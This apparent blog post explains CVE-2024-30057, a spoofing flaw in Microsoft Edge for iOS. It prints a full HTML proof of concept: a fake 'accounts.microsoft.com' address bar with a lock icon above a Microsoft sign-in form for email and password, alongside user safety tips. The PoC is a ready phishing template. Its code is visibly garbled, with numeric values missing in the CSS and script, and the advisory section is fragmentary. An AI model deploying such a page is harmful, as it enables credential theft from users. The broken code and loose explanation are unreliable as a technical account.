CVE-2024-30057 - Microsoft Edge for iOS Spoofing Vulnerability Explained

On June 2024, a new vulnerability was disclosed in Microsoft Edge for iOS — tracked as CVE-2024-30057. While Edge is known for its security features, this bug showed once again that even major browsers are not immune to web-based attacks. In this post, we’ll break down what this vulnerability means, how it works, and what users and developers need to know. We will also show actual exploitation steps and reference official sources for further reading.

What is CVE-2024-30057?

CVE-2024-30057 is a spoofing vulnerability in the iOS version of Microsoft Edge. Spoofing vulnerabilities trick users into accepting fake information as legitimate. In this case, a malicious actor can make a fake website or content look as if it’s coming from a trusted domain in the Edge browser on iOS devices. This opens the door to phishing attacks, fake login screens, and other malicious activities.

### Microsoft's Official Advisory

User Interaction: Required – victim needs to visit a malicious site or click a tricky link

- Result: User could be tricked into thinking content is from a legitimate trusted source, potentially giving away sensitive information (like passwords).

How Does the Exploit Work?

The vulnerability exploits how the Edge browser handles URLs and the address bar display. A specially crafted web page can display a fake address bar or overlay, showing a trusted domain — such as https://accounts.microsoft.com — even though the site really belongs to the attacker.

The attacker creates a web page with some JavaScript and CSS tricks.

- The fake page hides the real address bar and shows a realistic-looking one which the user can’t distinguish from the real thing.

Proof-of-Concept (PoC) Code

Below is a simplified version of how the exploit might look. This code only demonstrates the spoofing and is for educational use ONLY!

<!DOCTYPE html>
<html lang="en">
<head>
  <title>Microsoft Edge iOS URL Spoof PoC</title>
  <meta name="viewport" content="width=device-width, initial-scale=1.">
  <style>
    #fakeaddress {
      position: fixed;
      top: ;
      left: ;
      width: 100vw;
      background: #fff;
      color: #222;
      font-size: 18px;
      padding: 8px  8px 20vw;
      z-index: 9999;
      box-shadow:  2px 4px rgba(,,,.1);
      font-family: Arial, sans-serif;
    }
    body { margin-top: 44px; }
  </style>
</head>
<body>
  <div id="fakeaddress">
    <img src="https://img.icons8.com/color/32/000000/lock--v1.png"; alt="lock" style="vertical-align:middle; width:16px;"/>
    https://accounts.microsoft.com
  </div>
  <h1>Sign in to your Microsoft Account</h1>
  <form>
    <input type="email" placeholder="Email address" />


    <input type="password" placeholder="Password" />


    <button type="submit">Sign in</button>
  </form>
  <script>
    // Optionally prevent scrolling address bar in some buggy browsers
    window.scrollTo(, );
  </script>
</body>
</html>

How it works:

The attacker could make this look even more real by copying OS style and icons.

- On mobile screens — especially in Microsoft Edge for iOS — the real address bar is often hidden when scrolling, making the fake bar the only thing visible.

Why iOS Was Uniquely Vulnerable

Microsoft Edge on iOS relies on Apple’s WebKit engine (not Chromium), but each browser is allowed slight UI differences. Due to how Edge hides the real address bar during web page interaction, the attacker’s fake bar becomes the only identifier available — and the legitimate URL is effectively hidden from the user.

Be aware that address bars can be hidden and replaced on mobile browsers.

- Don’t enter sensitive info unless you double-check the URL. Try scrolling up to reveal the original address bar.

References and Further Reading

- Microsoft Security Response Center: CVE-2024-30057 Advisory
- CVE Details for CVE-2024-30057
- Edge for iOS: Download Page
- WebKit Security Best Practices

Summary

CVE-2024-30057 shows how even mobile browsers with major players behind them can be fooled at the UI layer. Phishers have always chased ways to trick users, and UI spoofing is a low-tech, high-yield tactic. Microsoft responded quickly, but every user should be aware of the risk and practice caution, especially when using browsers that may hide the address bar.

Keep your browser updated. Double-check the URL. If something looks “off,” it probably is!


*If you found this breakdown helpful, consider sharing it with your team or customers. Protecting yourself starts with knowing what threats are possible — and how easily they can hide in plain sight.*

Timeline

Published on: 06/13/2024 20:15:12 UTC
Last modified on: 06/14/2024 18:20:37 UTC